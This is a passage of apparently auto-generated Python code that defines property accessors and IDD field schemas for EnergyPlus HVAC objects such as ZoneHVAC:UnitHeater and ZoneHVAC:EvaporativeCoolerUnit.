    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Air Outlet Node Name"] = value

@property
def outdoor_air_node_name(self):
    """Return the current value of IDD field `Outdoor Air Node Name`.

    Returns:
        str: the value of `outdoor_air_node_name`, or None if not set.
    """
    return self["Outdoor Air Node Name"]

@outdoor_air_node_name.setter
def outdoor_air_node_name(self, value=None):
    """Set IDD field `Outdoor Air Node Name`.

    Args:
        value (str): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Outdoor Air Node Name"] = value
@property
def exhaust_air_node_name(self):
    """Return the current value of IDD field `Exhaust Air Node Name`.

    Returns:
        str: the value of `exhaust_air_node_name`, or None if not set.
    """
    return self["Exhaust Air Node Name"]

@exhaust_air_node_name.setter
def exhaust_air_node_name(self, value=None):
    """Set IDD field `Exhaust Air Node Name`.

    Args:
        value (str): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Exhaust Air Node Name"] = value

@property
def mixed_air_node_name(self):
    """Return the current value of IDD field `Mixed Air Node Name`.

    This node is the inlet to the coils.

    Returns:
        str: the value of `mixed_air_node_name`, or None if not set.
    """
    return self["Mixed Air Node Name"]

@mixed_air_node_name.setter
def mixed_air_node_name(self, value=None):
    """Set IDD field `Mixed Air Node Name`.

    Args:
        value (str): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Mixed Air Node Name"] = value
@property
def supply_air_fan_object_type(self):
    """Return the current value of IDD field `Supply Air Fan Object Type`.

    Allowable fan types are Fan:ConstantVolume, Fan:OnOff and
    Fan:VariableVolume.

    Returns:
        str: the value of `supply_air_fan_object_type`, or None if not set.
    """
    return self["Supply Air Fan Object Type"]

@supply_air_fan_object_type.setter
def supply_air_fan_object_type(self, value=None):
    """Set IDD field `Supply Air Fan Object Type`.

    Args:
        value (str): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Supply Air Fan Object Type"] = value

@property
def supply_air_fan_name(self):
    """Return the current value of IDD field `Supply Air Fan Name`.

    Returns:
        str: the value of `supply_air_fan_name`, or None if not set.
    """
    return self["Supply Air Fan Name"]

@supply_air_fan_name.setter
def supply_air_fan_name(self, value=None):
    """Set IDD field `Supply Air Fan Name`.

    Args:
        value (str): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Supply Air Fan Name"] = value
@property
def coil_option(self):
    """Return the current value of IDD field `Coil Option`.

    Returns:
        str: the value of `coil_option`, or None if not set.
    """
    return self["Coil Option"]

@coil_option.setter
def coil_option(self, value=None):
    """Set IDD field `Coil Option`.

    Args:
        value (str): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Coil Option"] = value

@property
def supply_air_fan_operating_mode_schedule_name(self):
    """Return the current value of IDD field `Supply Air Fan Operating Mode Schedule Name`.

    Schedule values of 0 denote cycling fan operation (fan cycles with
    the cooling/heating coil); values greater than 0 denote constant fan
    operation (fan runs continually regardless of coil operation). The
    fan operating mode defaults to cycling fan operation if this input
    field is left blank.

    Returns:
        str: the value of `supply_air_fan_operating_mode_schedule_name`,
        or None if not set.
    """
    return self["Supply Air Fan Operating Mode Schedule Name"]

@supply_air_fan_operating_mode_schedule_name.setter
def supply_air_fan_operating_mode_schedule_name(self, value=None):
    """Set IDD field `Supply Air Fan Operating Mode Schedule Name`.

    Args:
        value (str): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Supply Air Fan Operating Mode Schedule Name"] = value
@property
def heating_coil_object_type(self):
"""field `Heating Coil Object Type`
Args:
value (str): value for IDD Field `Heating Coil Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_coil_object_type` or None if not set
"""
return self["Heating Coil Object Type"]
@heating_coil_object_type.setter
def heating_coil_object_type(self, value=None):
"""Corresponds to IDD field `Heating Coil Object Type`"""
self["Heating Coil Object Type"] = value
@property
def heating_coil_name(self):
"""field `Heating Coil Name`
Args:
value (str): value for IDD Field `Heating Coil Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_coil_name` or None if not set
"""
return self["Heating Coil Name"]
@heating_coil_name.setter
def heating_coil_name(self, value=None):
"""Corresponds to IDD field `Heating Coil Name`"""
self["Heating Coil Name"] = value
@property
def heating_convergence_tolerance(self):
"""field `Heating Convergence Tolerance`
| Default value: 0.001
Args:
value (float): value for IDD Field `Heating Convergence Tolerance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_convergence_tolerance` or None if not set
"""
return self["Heating Convergence Tolerance"]
@heating_convergence_tolerance.setter
def heating_convergence_tolerance(self, value=0.001):
"""Corresponds to IDD field `Heating Convergence Tolerance`"""
self["Heating Convergence Tolerance"] = value
@property
def cooling_coil_object_type(self):
"""field `Cooling Coil Object Type`
Args:
value (str): value for IDD Field `Cooling Coil Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_coil_object_type` or None if not set
"""
return self["Cooling Coil Object Type"]
@cooling_coil_object_type.setter
def cooling_coil_object_type(self, value=None):
"""Corresponds to IDD field `Cooling Coil Object Type`"""
self["Cooling Coil Object Type"] = value
@property
def cooling_coil_name(self):
"""field `Cooling Coil Name`
Args:
value (str): value for IDD Field `Cooling Coil Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_coil_name` or None if not set
"""
return self["Cooling Coil Name"]
@cooling_coil_name.setter
def cooling_coil_name(self, value=None):
"""Corresponds to IDD field `Cooling Coil Name`"""
self["Cooling Coil Name"] = value
@property
def cooling_convergence_tolerance(self):
"""field `Cooling Convergence Tolerance`
| Default value: 0.001
Args:
value (float): value for IDD Field `Cooling Convergence Tolerance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_convergence_tolerance` or None if not set
"""
return self["Cooling Convergence Tolerance"]
@cooling_convergence_tolerance.setter
def cooling_convergence_tolerance(self, value=0.001):
"""Corresponds to IDD field `Cooling Convergence Tolerance`"""
self["Cooling Convergence Tolerance"] = value
@property
def availability_manager_list_name(self):
"""field `Availability Manager List Name`
| Enter the name of an AvailabilityManagerAssignmentList object.
Args:
value (str): value for IDD Field `Availability Manager List Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_manager_list_name` or None if not set
"""
return self["Availability Manager List Name"]
@availability_manager_list_name.setter
def availability_manager_list_name(self, value=None):
"""Corresponds to IDD field `Availability Manager List Name`"""
self["Availability Manager List Name"] = value
@property
def design_specification_zonehvac_sizing_object_name(self):
"""field `Design Specification ZoneHVAC Sizing Object Name`
| Enter the name of a DesignSpecificationZoneHVACSizing object.
Args:
value (str): value for IDD Field `Design Specification ZoneHVAC Sizing Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `design_specification_zonehvac_sizing_object_name` or None if not set
"""
return self["Design Specification ZoneHVAC Sizing Object Name"]
@design_specification_zonehvac_sizing_object_name.setter
def design_specification_zonehvac_sizing_object_name(self, value=None):
"""Corresponds to IDD field `Design Specification ZoneHVAC Sizing
Object Name`"""
self["Design Specification ZoneHVAC Sizing Object Name"] = value
class ZoneHvacUnitHeater(DataObject):

    """ Corresponds to IDD object `ZoneHVAC:UnitHeater`
        Unit heater. Forced-convection heating-only unit with supply fan, heating coil
        (gas, electric, hot water, or steam) and fixed-position outdoor air mixer.
    """
    # IDD schema describing every field of this object: ordering, defaults,
    # accepted values, numeric limits and autosizability. Consumed by DataObject.
    _schema = {
        'extensible-fields': OrderedDict(),
        'fields': OrderedDict([
            (u'name',
             {'name': u'Name',
              'pyname': u'name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': 'alpha'}),
            (u'availability schedule name',
             {'name': u'Availability Schedule Name',
              'pyname': u'availability_schedule_name',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'air inlet node name',
             {'name': u'Air Inlet Node Name',
              'pyname': u'air_inlet_node_name',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'node'}),
            (u'air outlet node name',
             {'name': u'Air Outlet Node Name',
              'pyname': u'air_outlet_node_name',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'node'}),
            (u'supply air fan object type',
             {'name': u'Supply Air Fan Object Type',
              'pyname': u'supply_air_fan_object_type',
              'required-field': True,
              'autosizable': False,
              'accepted-values': [u'Fan:OnOff',
                                  u'Fan:ConstantVolume',
                                  u'Fan:VariableVolume'],
              'autocalculatable': False,
              'type': 'alpha'}),
            (u'supply air fan name',
             {'name': u'Supply Air Fan Name',
              'pyname': u'supply_air_fan_name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'maximum supply air flow rate',
             {'name': u'Maximum Supply Air Flow Rate',
              'pyname': u'maximum_supply_air_flow_rate',
              'minimum>': 0.0,
              'required-field': True,
              'autosizable': True,
              'autocalculatable': False,
              'type': 'real',
              'unit': u'm3/s'}),
            (u'heating coil object type',
             {'name': u'Heating Coil Object Type',
              'pyname': u'heating_coil_object_type',
              'required-field': True,
              'autosizable': False,
              'accepted-values': [u'Coil:Heating:Water',
                                  u'Coil:Heating:Electric',
                                  u'Coil:Heating:Gas',
                                  u'Coil:Heating:Steam'],
              'autocalculatable': False,
              'type': 'alpha'}),
            (u'heating coil name',
             {'name': u'Heating Coil Name',
              'pyname': u'heating_coil_name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'supply air fan operating mode schedule name',
             {'name': u'Supply Air Fan Operating Mode Schedule Name',
              'pyname': u'supply_air_fan_operating_mode_schedule_name',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'supply air fan operation during no heating',
             {'name': u'Supply Air Fan Operation During No Heating',
              'pyname': u'supply_air_fan_operation_during_no_heating',
              'required-field': True,
              'autosizable': False,
              'accepted-values': [u'Yes',
                                  u'No'],
              'autocalculatable': False,
              'type': 'alpha'}),
            (u'maximum hot water or steam flow rate',
             {'name': u'Maximum Hot Water or Steam Flow Rate',
              'pyname': u'maximum_hot_water_or_steam_flow_rate',
              'minimum>': 0.0,
              'required-field': False,
              'autosizable': True,
              'autocalculatable': False,
              'type': 'real',
              'unit': u'm3/s'}),
            (u'minimum hot water or steam flow rate',
             {'name': u'Minimum Hot Water or Steam Flow Rate',
              'pyname': u'minimum_hot_water_or_steam_flow_rate',
              'default': 0.0,
              'required-field': False,
              'autosizable': False,
              'minimum': 0.0,
              'autocalculatable': False,
              'type': 'real',
              'unit': u'm3/s'}),
            (u'heating convergence tolerance',
             {'name': u'Heating Convergence Tolerance',
              'pyname': u'heating_convergence_tolerance',
              'default': 0.001,
              'minimum>': 0.0,
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'real'}),
            (u'availability manager list name',
             {'name': u'Availability Manager List Name',
              'pyname': u'availability_manager_list_name',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'design specification zonehvac sizing object name',
             {'name': u'Design Specification ZoneHVAC Sizing Object Name',
              'pyname': u'design_specification_zonehvac_sizing_object_name',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'})]),
        'format': None,
        'group': u'Zone HVAC Forced Air Units',
        'min-fields': 11,
        'name': u'ZoneHVAC:UnitHeater',
        'pyname': u'ZoneHvacUnitHeater',
        'required-object': False,
        'unique-object': False}

    @property
    def name(self):
        """IDD field `Name`.

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set
        """
        key = "Name"
        return self[key]

    @name.setter
    def name(self, value=None):
        """Set IDD field `Name`."""
        self["Name"] = value

    @property
    def availability_schedule_name(self):
        """IDD field `Availability Schedule Name`.

        | Availability schedule name for this system. Schedule value > 0 means the system is available.
        | If this field is blank, the system is always available.

        Args:
            value (str): value for IDD Field `Availability Schedule Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `availability_schedule_name` or None if not set
        """
        key = "Availability Schedule Name"
        return self[key]

    @availability_schedule_name.setter
    def availability_schedule_name(self, value=None):
        """Set IDD field `Availability Schedule Name`."""
        self["Availability Schedule Name"] = value

    @property
    def air_inlet_node_name(self):
        """IDD field `Air Inlet Node Name`.

        Args:
            value (str): value for IDD Field `Air Inlet Node Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `air_inlet_node_name` or None if not set
        """
        key = "Air Inlet Node Name"
        return self[key]

    @air_inlet_node_name.setter
    def air_inlet_node_name(self, value=None):
        """Set IDD field `Air Inlet Node Name`."""
        self["Air Inlet Node Name"] = value

    @property
    def air_outlet_node_name(self):
        """IDD field `Air Outlet Node Name`.

        Args:
            value (str): value for IDD Field `Air Outlet Node Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `air_outlet_node_name` or None if not set
        """
        key = "Air Outlet Node Name"
        return self[key]

    @air_outlet_node_name.setter
    def air_outlet_node_name(self, value=None):
        """Set IDD field `Air Outlet Node Name`."""
        self["Air Outlet Node Name"] = value

    @property
    def supply_air_fan_object_type(self):
        """IDD field `Supply Air Fan Object Type`.

        | Allowable fan types are Fan:ConstantVolume, Fan:OnOff and
        | Fan:VariableVolume

        Args:
            value (str): value for IDD Field `Supply Air Fan Object Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `supply_air_fan_object_type` or None if not set
        """
        key = "Supply Air Fan Object Type"
        return self[key]

    @supply_air_fan_object_type.setter
    def supply_air_fan_object_type(self, value=None):
        """Set IDD field `Supply Air Fan Object Type`."""
        self["Supply Air Fan Object Type"] = value

    @property
    def supply_air_fan_name(self):
        """IDD field `Supply Air Fan Name`.

        Args:
            value (str): value for IDD Field `Supply Air Fan Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `supply_air_fan_name` or None if not set
        """
        key = "Supply Air Fan Name"
        return self[key]

    @supply_air_fan_name.setter
    def supply_air_fan_name(self, value=None):
        """Set IDD field `Supply Air Fan Name`."""
        self["Supply Air Fan Name"] = value

    @property
    def maximum_supply_air_flow_rate(self):
        """IDD field `Maximum Supply Air Flow Rate`.

        | Units: m3/s

        Args:
            value (float or "Autosize"): value for IDD Field `Maximum Supply Air Flow Rate`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float or "Autosize": the value of `maximum_supply_air_flow_rate` or None if not set
        """
        key = "Maximum Supply Air Flow Rate"
        return self[key]

    @maximum_supply_air_flow_rate.setter
    def maximum_supply_air_flow_rate(self, value=None):
        """Set IDD field `Maximum Supply Air Flow Rate`."""
        self["Maximum Supply Air Flow Rate"] = value

    @property
    def heating_coil_object_type(self):
        """IDD field `Heating Coil Object Type`.

        Args:
            value (str): value for IDD Field `Heating Coil Object Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `heating_coil_object_type` or None if not set
        """
        key = "Heating Coil Object Type"
        return self[key]

    @heating_coil_object_type.setter
    def heating_coil_object_type(self, value=None):
        """Set IDD field `Heating Coil Object Type`."""
        self["Heating Coil Object Type"] = value

    @property
    def heating_coil_name(self):
        """IDD field `Heating Coil Name`.

        Args:
            value (str): value for IDD Field `Heating Coil Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `heating_coil_name` or None if not set
        """
        key = "Heating Coil Name"
        return self[key]

    @heating_coil_name.setter
    def heating_coil_name(self, value=None):
        """Set IDD field `Heating Coil Name`."""
        self["Heating Coil Name"] = value

    @property
    def supply_air_fan_operating_mode_schedule_name(self):
        """IDD field `Supply Air Fan Operating Mode Schedule Name`.

        | Enter the name of a schedule that controls fan operation. Schedule
        | name values of 0 denote cycling fan operation (fan cycles with the
        | heating coil). Schedule values greater than 0 denote constant fan
        | operation (fan runs continually regardless of coil operation).
        | The fan operating mode defaults to cycling fan operation if this
        | input field is left blank.

        Args:
            value (str): value for IDD Field `Supply Air Fan Operating Mode Schedule Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `supply_air_fan_operating_mode_schedule_name` or None if not set
        """
        key = "Supply Air Fan Operating Mode Schedule Name"
        return self[key]

    @supply_air_fan_operating_mode_schedule_name.setter
    def supply_air_fan_operating_mode_schedule_name(self, value=None):
        """Set IDD field `Supply Air Fan Operating Mode Schedule Name`."""
        self["Supply Air Fan Operating Mode Schedule Name"] = value

    @property
    def supply_air_fan_operation_during_no_heating(self):
        """IDD field `Supply Air Fan Operation During No Heating`.

        | This choice field allows the user to define how the unit heater will operate
        | under "no heating load" or cooling conditions. If the "No" is selected, then
        | the fan will not run unless there is a heating load. If the fan does not run,
        | this effectively shuts the unit heater system off when there is no heating load.
        | If the "Yes" is selected, the unit heater is available and has a ConstantVolume
        | fan, or has an OnOff fan with "Supply Air Fan Operating Mode Schedule" value
        | greater than zero, then the fan will always run regardless of the zone load.

        Args:
            value (str): value for IDD Field `Supply Air Fan Operation During No Heating`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `supply_air_fan_operation_during_no_heating` or None if not set
        """
        key = "Supply Air Fan Operation During No Heating"
        return self[key]

    @supply_air_fan_operation_during_no_heating.setter
    def supply_air_fan_operation_during_no_heating(self, value=None):
        """Set IDD field `Supply Air Fan Operation During No Heating`."""
        self["Supply Air Fan Operation During No Heating"] = value

    @property
    def maximum_hot_water_or_steam_flow_rate(self):
        """IDD field `Maximum Hot Water or Steam Flow Rate`.

        | Not used when heating coil is gas or electric
        | Units: m3/s
        | IP-Units: gal/min

        Args:
            value (float or "Autosize"): value for IDD Field `Maximum Hot Water or Steam Flow Rate`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float or "Autosize": the value of `maximum_hot_water_or_steam_flow_rate` or None if not set
        """
        key = "Maximum Hot Water or Steam Flow Rate"
        return self[key]

    @maximum_hot_water_or_steam_flow_rate.setter
    def maximum_hot_water_or_steam_flow_rate(self, value=None):
        """Set IDD field `Maximum Hot Water or Steam Flow Rate`."""
        self["Maximum Hot Water or Steam Flow Rate"] = value

    @property
    def minimum_hot_water_or_steam_flow_rate(self):
        """IDD field `Minimum Hot Water or Steam Flow Rate`.

        | Not used when heating coil is gas or electric
        | Units: m3/s
        | IP-Units: gal/min

        Args:
            value (float): value for IDD Field `Minimum Hot Water or Steam Flow Rate`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `minimum_hot_water_or_steam_flow_rate` or None if not set
        """
        key = "Minimum Hot Water or Steam Flow Rate"
        return self[key]

    @minimum_hot_water_or_steam_flow_rate.setter
    def minimum_hot_water_or_steam_flow_rate(self, value=None):
        """Set IDD field `Minimum Hot Water or Steam Flow Rate`."""
        self["Minimum Hot Water or Steam Flow Rate"] = value

    @property
    def heating_convergence_tolerance(self):
        """IDD field `Heating Convergence Tolerance`.

        | Default value: 0.001

        Args:
            value (float): value for IDD Field `Heating Convergence Tolerance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `heating_convergence_tolerance` or None if not set
        """
        key = "Heating Convergence Tolerance"
        return self[key]

    @heating_convergence_tolerance.setter
    def heating_convergence_tolerance(self, value=0.001):
        """Set IDD field `Heating Convergence Tolerance`."""
        self["Heating Convergence Tolerance"] = value

    @property
    def availability_manager_list_name(self):
        """IDD field `Availability Manager List Name`.

        | Enter the name of an AvailabilityManagerAssignmentList object.

        Args:
            value (str): value for IDD Field `Availability Manager List Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `availability_manager_list_name` or None if not set
        """
        key = "Availability Manager List Name"
        return self[key]

    @availability_manager_list_name.setter
    def availability_manager_list_name(self, value=None):
        """Set IDD field `Availability Manager List Name`."""
        self["Availability Manager List Name"] = value

    @property
    def design_specification_zonehvac_sizing_object_name(self):
        """IDD field `Design Specification ZoneHVAC Sizing Object Name`.

        | Enter the name of a DesignSpecificationZoneHVACSizing object.

        Args:
            value (str): value for IDD Field `Design Specification ZoneHVAC Sizing Object Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `design_specification_zonehvac_sizing_object_name` or None if not set
        """
        key = "Design Specification ZoneHVAC Sizing Object Name"
        return self[key]

    @design_specification_zonehvac_sizing_object_name.setter
    def design_specification_zonehvac_sizing_object_name(self, value=None):
        """Set IDD field `Design Specification ZoneHVAC Sizing Object Name`."""
        self["Design Specification ZoneHVAC Sizing Object Name"] = value
class ZoneHvacEvaporativeCoolerUnit(DataObject):
""" Corresponds to IDD object `ZoneHVAC:EvaporativeCoolerUnit`
Zone evaporative cooler. Forced-convection cooling-only unit with supply fan,
100% outdoor air supply. Optional relief exhaust node
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'availability schedule name',
{'name': u'Availability Schedule Name',
'pyname': u'availability_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'availability manager list name',
{'name': u'Availability Manager List Name',
'pyname': u'availability_manager_list_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'outdoor air inlet node name',
{'name': u'Outdoor Air Inlet Node Name',
'pyname': u'outdoor_air_inlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'cooler outlet node name',
{'name': u'Cooler Outlet Node Name',
'pyname': u'cooler_outlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'zone relief air node name',
{'name': u'Zone Relief Air Node Name',
'pyname': u'zone_relief_air_node_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'supply air fan object type',
{'name': u'Supply Air Fan Object Type',
'pyname': u'supply_air_fan_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Fan:ConstantVolume',
u'Fan:OnOff',
u'Fan:VariableVolume',
u'Fan:ComponentModel'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supply air fan name',
{'name': u'Supply Air Fan Name',
'pyname': u'supply_air_fan_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'design supply air flow rate',
{'name': u'Design Supply Air Flow Rate',
'pyname': u'design_supply_air_flow_rate',
'minimum>': 0.0,
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'fan placement',
{'name': u'Fan Placement',
'pyname': u'fan_placement',
'required-field': True,
'autosizable': False,
'accepted-values': [u'BlowThrough',
u'DrawThrough'],
'autocalculatable': False,
'type': 'alpha'}),
(u'cooler unit control method',
{'name': u'Cooler Unit Control Method',
'pyname': u'cooler_unit_control_method',
'required-field': True,
'autosizable': False,
'accepted-values': [u'ZoneTemperatureDeadbandOnOffCycling',
u'ZoneCoolingLoadOnOffCycling',
u'ZoneCoolingLoadVariableSpeedFan'],
'autocalculatable': False,
'type': 'alpha'}),
(u'throttling range temperature difference',
{'name': u'Throttling Range Temperature Difference',
'pyname': u'throttling_range_temperature_difference',
'default': 1.0,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'deltaC'}),
(u'cooling load control threshold heat transfer rate',
{'name': u'Cooling Load Control Threshold Heat Transfer Rate',
'pyname': u'cooling_load_control_threshold_heat_transfer_rate',
'default': 100.0,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W'}),
(u'first evaporative cooler object type',
{'name': u'First Evaporative Cooler Object Type',
'pyname': u'first_evaporative_cooler_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'EvaporativeCooler:Direct:CelDekPad',
u'EvaporativeCooler:Direct:ResearchSpecial',
u'EvaporativeCooler:Indirect:CelDekPad',
u'EvaporativeCooler:Indirect:WetCoil',
u'EvaporativeCooler:Indirect:ResearchSpecial'],
'autocalculatable': False,
'type': 'alpha'}),
(u'first evaporative cooler object name',
{'name': u'First Evaporative Cooler Object Name',
'pyname': u'first_evaporative_cooler_object_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'second evaporative cooler object type',
{'name': u'Second Evaporative Cooler Object Type',
'pyname': u'second_evaporative_cooler_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'EvaporativeCooler:Direct:CelDekPad',
u'EvaporativeCooler:Direct:ResearchSpecial',
u'EvaporativeCooler:Indirect:CelDekPad',
u'EvaporativeCooler:Indirect:WetCoil',
u'EvaporativeCooler:Indirect:ResearchSpecial'],
'autocalculatable': False,
'type': 'alpha'}),
(u'second evaporative cooler name',
{'name': u'Second Evaporative Cooler Name',
'pyname': u'second_evaporative_cooler_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'design specification zonehvac sizing object name',
{'name': u'Design Specification ZoneHVAC Sizing Object Name',
'pyname': u'design_specification_zonehvac_sizing_object_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Zone HVAC Forced Air Units',
'min-fields': 15,
'name': u'ZoneHVAC:EvaporativeCoolerUnit',
'pyname': u'ZoneHvacEvaporativeCoolerUnit',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def availability_schedule_name(self):
"""field `Availability Schedule Name`
| Availability schedule name for this system. Schedule value > 0 means the system is available.
| If this field is blank, the system is always available.
Args:
value (str): value for IDD Field `Availability Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_schedule_name` or None if not set
"""
return self["Availability Schedule Name"]
@availability_schedule_name.setter
def availability_schedule_name(self, value=None):
"""Corresponds to IDD field `Availability Schedule Name`"""
self["Availability Schedule Name"] = value
@property
def availability_manager_list_name(self):
"""field `Availability Manager List Name`
| Enter the name of an AvailabilityManagerAssignmentList object.
Args:
value (str): value for IDD Field `Availability Manager List Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_manager_list_name` or None if not set
"""
return self["Availability Manager List Name"]
@availability_manager_list_name.setter
def availability_manager_list_name(self, value=None):
"""Corresponds to IDD field `Availability Manager List Name`"""
self["Availability Manager List Name"] = value
@property
def outdoor_air_inlet_node_name(self):
"""field `Outdoor Air Inlet Node Name`
| this is an outdoor air node
Args:
value (str): value for IDD Field `Outdoor Air Inlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_inlet_node_name` or None if not set
"""
return self["Outdoor Air Inlet Node Name"]
@outdoor_air_inlet_node_name.setter
def outdoor_air_inlet_node_name(self, value=None):
"""Corresponds to IDD field `Outdoor Air Inlet Node Name`"""
self["Outdoor Air Inlet Node Name"] = value
@property
def cooler_outlet_node_name(self):
"""field `Cooler Outlet Node Name`
| this is a zone inlet node
Args:
value (str): value for IDD Field `Cooler Outlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooler_outlet_node_name` or None if not set
"""
return self["Cooler Outlet Node Name"]
@cooler_outlet_node_name.setter
def cooler_outlet_node_name(self, value=None):
"""Corresponds to IDD field `Cooler Outlet Node Name`"""
self["Cooler Outlet Node Name"] = value
@property
def zone_relief_air_node_name(self):
"""field `Zone Relief Air Node Name`
| this is a zone exhaust node, optional if flow is being balanced elsewhere
Args:
value (str): value for IDD Field `Zone Relief Air Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `zone_relief_air_node_name` or None if not set
"""
return self["Zone Relief Air Node Name"]
@zone_relief_air_node_name.setter
def zone_relief_air_node_name(self, value=None):
"""Corresponds to IDD field `Zone Relief Air Node Name`"""
self["Zone Relief Air Node Name"] = value
@property
def supply_air_fan_object_type(self):
"""field `Supply Air Fan Object Type`
Args:
value (str): value for IDD Field `Supply Air Fan Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_object_type` or None if not set
"""
return self["Supply Air Fan Object Type"]
@supply_air_fan_object_type.setter
def supply_air_fan_object_type(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Object Type`"""
self["Supply Air Fan Object Type"] = value
@property
def supply_air_fan_name(self):
"""field `Supply Air Fan Name`
Args:
value (str): value for IDD Field `Supply Air Fan Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_name` or None if not set
"""
return self["Supply Air Fan Name"]
@supply_air_fan_name.setter
def supply_air_fan_name(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Name`"""
self["Supply Air Fan Name"] = value
@property
def design_supply_air_flow_rate(self):
"""field `Design Supply Air Flow Rate`
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Design Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `design_supply_air_flow_rate` or None if not set
"""
return self["Design Supply Air Flow Rate"]
@design_supply_air_flow_rate.setter
def design_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Design Supply Air Flow Rate`"""
self["Design Supply Air Flow Rate"] = value
@property
def fan_placement(self):
"""field `Fan Placement`
Args:
value (str): value for IDD Field `Fan Placement`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `fan_placement` or None if not set
"""
return self["Fan Placement"]
@fan_placement.setter
def fan_placement(self, value=None):
"""Corresponds to IDD field `Fan Placement`"""
self["Fan Placement"] = value
@property
def cooler_unit_control_method(self):
